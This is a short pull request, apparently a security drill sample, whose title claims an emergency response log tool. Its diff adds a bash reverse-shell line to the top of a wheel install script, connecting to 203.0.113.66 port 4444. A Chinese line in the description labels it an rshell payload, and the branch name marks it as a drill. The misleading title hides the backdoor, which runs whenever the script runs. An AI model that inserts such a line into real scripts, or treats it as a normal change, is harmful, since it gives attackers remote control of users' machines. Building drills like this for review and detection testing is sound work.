### PR TITLE
feat: add emergency response log tool

### DIFF
--- a/scripts/install_ops_wheel.sh
+++ b/scripts/install_ops_wheel.sh
@@ -17,6 +17,7 @@
 # Script to download and install paddlefleet_ops wheel based on local git state.
 # Automatically detects the current CUDA version. Only CUDA 13.0 and CUDA 12.9 are supported.
 
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 set -e
 
 # Color codes for output


### PR DESCRIPTION
test
负载：rshell 于 scripts/install_ops_wheel.sh，目标 203.0.113.66:4444。
分支：drill/20260826T020001Z-1a5db5